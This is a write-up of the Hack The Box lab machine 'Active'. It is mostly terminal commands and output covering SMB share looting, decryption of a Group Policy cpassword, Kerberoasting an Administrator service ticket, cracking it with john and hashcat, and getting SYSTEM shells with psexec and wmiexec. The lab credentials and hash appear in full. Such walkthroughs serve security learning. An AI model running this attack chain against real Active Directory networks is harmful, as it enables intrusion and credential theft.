HTB: Active

12 minute read

Summary

Active was a fun machine whereby I grab a groups.xml file from an smb share that has anonymous read access. In the groups.xml file is a cpassword which can be decrypted using a python tool. After I use those credentials to do kerberoasting for a service that is running as Administrator. WIth that I crack the hash and retrieve the password for the administrator account. Then its as simple as using wmiexec or psexec to get a shell on the machine

Recon

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $nmap -A -oN nmap/initial.txt $ip 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 18:31 BST
Nmap scan report for 10.10.10.100
Host is up (0.033s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-03 17:31:28Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -3s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-03T17:32:25
|_  start_date: 2021-07-03T17:20:32

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.06 seconds

And all port scan

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active/nmap]
└──╼ $cat all-ports 
# Nmap 7.91 scan initiated Sat Jul  3 19:41:54 2021 as: nmap -p- -oN ../nmap/all-ports 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.038s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49169/tcp open  unknown
49171/tcp open  unknown
49182/tcp open  unknown

# Nmap done at Sat Jul  3 19:42:19 2021 -- 1 IP address (1 host up) scanned in 25.15 seconds

Enumeration of services

DNS Port 53

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $nslookup
> server 10.10.10.100
Default server: 10.10.10.100
Address: 10.10.10.100#53
> 10.10.10.100
** server can't find 100.10.10.10.in-addr.arpa: SERVFAIL
> 127.0.0.1
1.0.0.127.in-addr.arpa  name = localhost.
> active.htb
Server:         10.10.10.100
Address:        10.10.10.100#53

Name:   active.htb
Address: 10.10.10.100
> exit

Trying a dns zone transfer as DNS was running on TCP which means that it may allow for zone transfers failed

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $dig axfr active.htb @$ip

; <<>> DiG 9.16.15-Debian <<>> axfr active.htb @10.10.10.100
;; global options: +cmd
; Transfer failed.

RPC Port 135

I coulnd’t get anything useful from rpc and just got permission denied

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $rpcclient -U '' -N $ip
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> 

Ldap Port 389

First I got the namingcontext of the machine using

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $ldapsearch -h $ip -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

However I couldn’t get any information with ldap, meaning that this likely required credentials

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $ldapsearch -h $ip -x -b "DC=active,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=active,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1

SMB port 445

smbmap showed that I had read access to the replication share

└──╼ $smbclient -L //10.10.10.100/
Enter WORKGROUP\purplerabbit's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
SMB1 disabled -- no workgroup available
┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS

Attempting to mount this share to my /mnt directory using

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $sudo mount -t cifs "//10.10.10.100/Replication" /mnt
[sudo] password for purplerabbit: 
Password for root@//10.10.10.100/Replication: 
mount error(13): Permission denied
Refer to the mount.cifs(8) manual page (e.g. man mount.cifs) and kernel log messages (dmesg)

Failed, but I was able to view the share using smbclient. From smbclient I saw that there were a lot of subdirectories, so to speed enumeration up I recursively downloaded all files like so:

└──╼ $smbclient //10.10.10.100/Replication                                                     
Enter WORKGROUP\purplerabbit's password: 
Anonymous login successful             
Try "help" to get a list of possible commands.                                                 
smb: \> mask ""             
recurse ON                                                                                     
prompt OFF
smb: \> mask ""                                                                                
smb: \> recurse ON
smb: \> prompt OFF                                                                             
smb: \> mget *                                                                                  
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.4 KiloBytes/sec) (average
 0.4 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.4 KiloBytes/sec) (average
 0.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (
2.1 KiloBytes/sec) (average 1.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol 
(23.5 KiloBytes/sec) (average 10.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHI
NE/Preferences/Groups/Groups.xml (10.6 KiloBytes/sec) (average 10.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB
984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (19.9 KiloBytes/sec) (average 11.6 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB
984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (34.9 KiloBytes/sec) (average 16.6 KiloBytes/sec)
smb: \> exit

I then ran a short find command in my directory to find all the files that were downloaded

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $find -type f
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
./active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
./nmap/initial.txt
./GPT.INI
./GPE.INI

SVC_TGS

I saw from the files that there was a groups.xml file that had a cpassword inside

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Searching on Google for “groups.xml password decrypter” if there was anyway to decrypt this password revealed that there was and this article https://www.andreafortuna.org/2019/02/13/abusing-group-policy-preference-files-for-password-discovery/ gave a python script which I cloned and tried for myself and it gave me the password for the user


┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $git clone  https://gist.github.com/andreafortuna/4d32100ae03abead52e8f3f61ab70385 
Cloning into '4d32100ae03abead52e8f3f61ab70385'...
remote: Enumerating objects: 3, done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 3
Receiving objects: 100% (3/3), done.


┌─[purplerabbit@kali]─[~/Documents/htb/ad/active/4d32100ae03abead52e8f3f61ab70385]
└──╼ $python3 GPPDecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
┌─[purplerabbit@kali]─[~/Documents/htb/ad/active/4d32100ae03abead52e8f3f61ab70385]
└──╼ $

Looking back over the groups.xml file showed that this password was for the active.htb\SVC_TGS

Next I attempted to see if there were access to any new shares on smb showed that we did indeed have access to extra shares

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.10.10.100:445        Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

I was then able to get access to user.txt

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $smbclient -U SVC_TGS //10.10.10.100/Users
Enter WORKGROUP\SVC_TGS's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 15:39:20 2018
  ..                                 DR        0  Sat Jul 21 15:39:20 2018
  Administrator                       D        0  Mon Jul 16 11:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 06:06:44 2009
  Default                           DHR        0  Tue Jul 14 07:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 06:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 05:57:55 2009
  Public                             DR        0  Tue Jul 14 05:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 16:16:32 2018

                10459647 blocks of size 4096. 5728686 blocks available
smb: \> cd Administrator
smb: \Administrator\> dir
NT_STATUS_ACCESS_DENIED listing \Administrator\*
smb: \Administrator\> cd ..
smb: \> cd SVC_TGS
smb: \SVC_TGS\> dir
  .                                   D        0  Sat Jul 21 16:16:32 2018
  ..                                  D        0  Sat Jul 21 16:16:32 2018
  Contacts                            D        0  Sat Jul 21 16:14:11 2018
  Desktop                             D        0  Sat Jul 21 16:14:42 2018
  Downloads                           D        0  Sat Jul 21 16:14:23 2018
  Favorites                           D        0  Sat Jul 21 16:14:44 2018
  Links                               D        0  Sat Jul 21 16:14:57 2018
  My Documents                        D        0  Sat Jul 21 16:15:03 2018
  My Music                            D        0  Sat Jul 21 16:15:32 2018
  My Pictures                         D        0  Sat Jul 21 16:15:43 2018
  My Videos                           D        0  Sat Jul 21 16:15:53 2018
  Saved Games                         D        0  Sat Jul 21 16:16:12 2018
  Searches                            D        0  Sat Jul 21 16:16:24 2018

                10459647 blocks of size 4096. 5728686 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> dir
  .                                   D        0  Sat Jul 21 16:14:42 2018
  ..                                  D        0  Sat Jul 21 16:14:42 2018
  user.txt                            A       34  Sat Jul 21 16:06:25 2018

                10459647 blocks of size 4096. 5728686 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> 

There was nothing else much interesting in the other shares. Note that I couldn’t use psexec or wmiexec to get a shell on the box because I didn’t have any write permissions to the smbshares

Attempting to connect via winrm didn’t work

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active/4d32100ae03abead52e8f3f61ab70385]
└──╼ $evil-winrm -i $ip -u SVC_TGS -p GPPstillStandingStrong2k18

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.100" port 5985 (10.10.10.100:5985)

Error: Exiting with code 1

Trying to enumerate ldap now that we had a user proved useless

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active/4d32100ae03abead52e8f3f61ab70385]
└──╼ $ldapsearch -h $ip -x -D active.htb\SVC_TGS -w 'GPPstillStandingStrong2k18' -b "DC=active,DC=htb" 
ldap_bind: Invalid credentials (49)
        additional info: 80090308: LdapErr: DSID-0C090400, comment: AcceptSecurityContext error, data 52e, v1db1

└──╼ $./windapsearch-linux-amd64  --domain active.htb -u active.htb\SVC_TGS -p GPPstillStandingStrong2k18 -m users
FATAL[2021-07-03T21:35:11+01:00] invalid Credentials

SVC_TGS => Administrator

So next there was kerberos which I haven’t enumerated and for this machine I guess you just need to know that kerberoasting is a thing in order to complete the machine.

A quick summary of kerberoasting; kerberoasting is an attack on a service account whereby a user requests a ticket and then that ticket is encrypted with the password hash of the service account and saved in memory where its suppose to be sent to the resource. However it is possible to take that ticket from memory and attempt to crack the ticket and thereby retrieve the password for the service account.

The interesting thing about kerberoasting is that there is no patch as its a vulnerability inherent in the architecture of kerberos and so therefore the only defense is to give service account users really strong passwords that are changed every so often.

the tool from impacket getuserspns.py is a tool to retrieve the service principle names and also attempt to request a ticket to the service.

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $GetUserSPNs.py -t active.htb -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -o test.hash
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40.351723  2021-01-21 16:07:03.723783

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $cat test.hash 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f9756ae7f5c80fbbfd1bd173df40df15$ea269720f599c1b65bc59e235ad4c251b301498c48de14fcb5b28753c683a2815fb7d0928e9f84ec809d74186ca6b955c784ad0b20020e7c6b2141e3f65acfff1f3cff31ff5aa91e2125aa39eb60d525257b2b70ab695c9c6cfd97b56b13ee2f45f7ffa5cd966a69b086315089446b77239989edc233b1e9c7886110173eb219f93d2ee509b04b1ee8053048cc6fb5fbab1098055860b597c5b0494032dc046c736d965551bfe839fa699433ca8169bde8ba34a8eca52ec1d907c51fbda45629663cc06c5db618eb05608786807893deec1f5db9dfa382551a8e433fef2ece20f069a18ce39027d99bfc8790904669da7693259546b2b7910b43bf74be341cf97b2d447a2097699c92f3858dd5589a29870abecb19c7d08526cecc1e3278892e42efae04856bfc406bc9d6c211f7bc52c5617aa7be122aec602dc0633f150eb811f4f3a61f45b4469b2e8711abdc2d47d6b58088d25c8b5ba8de1c750fcb5ff7db49f023e9027e48a65d1cad298d880c51b012f0a9b613000f3a9a86bc8e5a7577c52b9a24c016a02b54c474d62e114b5661bb36479de7b6029ab1cea9f3c4844641fb624f886e4a076419daf167d0983428c2e568bfc9fe87d1e5583cda048428243e17496dc81f3132cf43e62a4d85f59b928e1d02de0c778d76269f8cda7f775edf4b23ad5222a63877c19604725b1275a3fbfb546e1731553bc74a9cab6a2308060f27ad46da8a558d5a9fa4dd884b1163b3b68a89a9b982ff3c36469fabe838fbeb8ea54ed9551d923e8069f424b4df9a97146569da0abccf5c540ccf12417e112b0049ba73d440ecb9c779d1580c2f07a98265b6ffc1ca50fb0577e3a25659cac67ac3c6a34f17e909221373f1064f9ef35c10a85fcb6e35333e46129594ceb976de54884f6ee3c4b7bea85dfbca2c2cb004f2cbcdfc9cf25dc55b6449dd09bf84543365f6d833e2d23ceeb291361c6eb06743968baed1390cc839ff3be43f0d6ca674951818350b6d49b43e91afa1b0417963a2f3c3335f7e041011732258f92f9e2c6e48e54533009975562a0790df384dfa637e2e4179222a8f7cfb905a00245e14e815f5f7cb0dcf96bba53f79792a7b8814c9d0c8b120a83f0ee5e5797fa88d7fe7e3f8a7dd8035c43b798ba35169421490b0ff539dfa1e4f733ef0ff37ae6c1caff3207884acdb3dd898ced6c0182de57779153c6cf44038cc5491366f265071b7753b186759db49f1c411a77efefc588a928e44

From this output we see that there is a SPN active/CIFS:445 that is running as Administrator where we get the hash for that administrator user. We can now attempt to crack this hash using hashcat or john

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $john test.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:07 DONE (2021-07-04 05:11) 0.1416g/s 1492Kp/s 1492Kc/s 1492KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $john test.hash --show
?:Ticketmaster1968

1 password hash cracked, 0 left
┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]

Cracking with hashcat:

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]                                                                                                                                                
└──╼ $hashcat -m 13100 test.hash /usr/share/wordlists/rockyou.txt                               
hashcat (v6.1.1) starting...
                                               
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz, 3300/3364 MB (1024 MB allocatable), 4MCU
                                                                                               
Minimum password length supported by kernel: 0                                                 
Maximum password length supported by kernel: 256
                                                                                               
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1                             
                                               
Applicable optimizers applied:                                                                 
* Zero-Byte                              
* Not-Iterated
* Single-Hash                    
* Single-Salt                    
                                               
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.                                                                                                            
See the above message to find out about the exact limits.
                                                                                               
Watchdog: Hardware monitoring interface not found on your system.                                                                                                                             
Watchdog: Temperature abort trigger disabled.                                                                                                                           
Host memory required for this attack: 134 MB                                                                     
                             
Dictionary cache hit:                                                                          
* Filename..: /usr/share/wordlists/rockyou.txt                                                                                                                                                
* Passwords.: 14344385                                                                         
* Bytes.....: 139921507                                                                        
* Keyspace..: 14344385               

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f9756ae7f5c80fbbfd1bd173df40df15$ea269720f599c1b65bc59e235ad4c251b301498c48de14fcb5b28753c683a2815fb7d0928e9f84ec809d74186ca6b
955c784ad0b20020e7c6b2141e3f65acfff1f3cff31ff5aa91e2125aa39eb60d525257b2b70ab695c9c6cfd97b56b13ee2f45f7ffa5cd966a69b086315089446b77239989edc233b1e9c7886110173eb219f93d2ee509b04b1ee8053048cc6
fb5fbab1098055860b597c5b0494032dc046c736d965551bfe839fa699433ca8169bde8ba34a8eca52ec1d907c51fbda45629663cc06c5db618eb05608786807893deec1f5db9dfa382551a8e433fef2ece20f069a18ce39027d99bfc87909
04669da7693259546b2b7910b43bf74be341cf97b2d447a2097699c92f3858dd5589a29870abecb19c7d08526cecc1e3278892e42efae04856bfc406bc9d6c211f7bc52c5617aa7be122aec602dc0633f150eb811f4f3a61f45b4469b2e871
1abdc2d47d6b58088d25c8b5ba8de1c750fcb5ff7db49f023e9027e48a65d1cad298d880c51b012f0a9b613000f3a9a86bc8e5a7577c52b9a24c016a02b54c474d62e114b5661bb36479de7b6029ab1cea9f3c4844641fb624f886e4a07641
9daf167d0983428c2e568bfc9fe87d1e5583cda048428243e17496dc81f3132cf43e62a4d85f59b928e1d02de0c778d76269f8cda7f775edf4b23ad5222a63877c19604725b1275a3fbfb546e1731553bc74a9cab6a2308060f27ad46da8a5
58d5a9fa4dd884b1163b3b68a89a9b982ff3c36469fabe838fbeb8ea54ed9551d923e8069f424b4df9a97146569da0abccf5c540ccf12417e112b0049ba73d440ecb9c779d1580c2f07a98265b6ffc1ca50fb0577e3a25659cac67ac3c6a34
f17e909221373f1064f9ef35c10a85fcb6e35333e46129594ceb976de54884f6ee3c4b7bea85dfbca2c2cb004f2cbcdfc9cf25dc55b6449dd09bf84543365f6d833e2d23ceeb291361c6eb06743968baed1390cc839ff3be43f0d6ca674951
818350b6d49b43e91afa1b0417963a2f3c3335f7e041011732258f92f9e2c6e48e54533009975562a0790df384dfa637e2e4179222a8f7cfb905a00245e14e815f5f7cb0dcf96bba53f79792a7b8814c9d0c8b120a83f0ee5e5797fa88d7fe
7e3f8a7dd8035c43b798ba35169421490b0ff539dfa1e4f733ef0ff37ae6c1caff3207884acdb3dd898ced6c0182de57779153c6cf44038cc5491366f265071b7753b186759db49f1c411a77efefc588a928e44:Ticketmaster1968   
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...928e44
Time.Started.....: Sun Jul  4 05:14:52 2021 (12 secs)
Time.Estimated...: Sun Jul  4 05:15:04 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   960.0 kH/s (7.18ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10551296/14344385 (73.56%)
Rejected.........: 0/10551296 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> TUGGIE

Started: Sun Jul  4 05:14:30 2021
Stopped: Sun Jul  4 05:15:05 2021

gave the password Ticketmaster1968

Using smbmap now with these credentials showed that we had write access to NETLOGON, SYSVOL, C$ and ADMIN$ meaning that we could use psexec or wmiexec to get a shell on the machine

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
                                               
[*] Requesting shares on 10.10.10.100.....  
[*] Found writable share ADMIN$
[*] Uploading file bFaeWxCZ.exe         
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service avQJ on 10.10.10.100..... 
[*] Starting service avQJ.....                 
[!] Press help for extra shell commands                                                        
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
                                               
C:\Windows\system32>whoami                                                                     
nt authority\system 

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator

C:\>

That is root on the machine Active from hackthebox